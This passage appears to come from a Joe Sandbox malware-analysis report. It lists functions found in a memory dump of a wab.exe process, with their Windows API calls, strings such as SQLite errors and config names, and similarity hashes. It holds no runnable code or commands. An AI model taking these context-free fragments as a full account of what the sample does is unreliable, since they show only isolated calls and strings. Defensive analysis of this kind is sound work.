                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                          • String ID: PD$PD
                                                                                                                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$wcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 239872665-3916222277
                                                                                                                                                                                                                          • Opcode ID: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                          • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                          • String ID: ($d
                                                                                                                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3015003838-0
                                                                                                                                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 59245283-0
                                                                                                                                                                                                                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3467550082-0
                                                                                                                                                                                                                          • Opcode ID: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                          • String ID: 3A
                                                                                                                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                                                                                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                                                                                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
